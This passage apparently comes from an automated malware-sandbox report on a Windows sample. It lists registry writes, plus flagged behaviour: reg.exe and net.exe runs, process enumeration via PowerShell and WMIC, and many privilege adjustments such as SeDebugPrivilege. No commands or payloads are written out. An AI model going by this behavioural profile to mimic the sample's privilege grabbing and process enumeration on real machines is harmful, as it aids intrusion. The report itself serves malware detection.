Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat" N/A N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07} N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" N/A N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
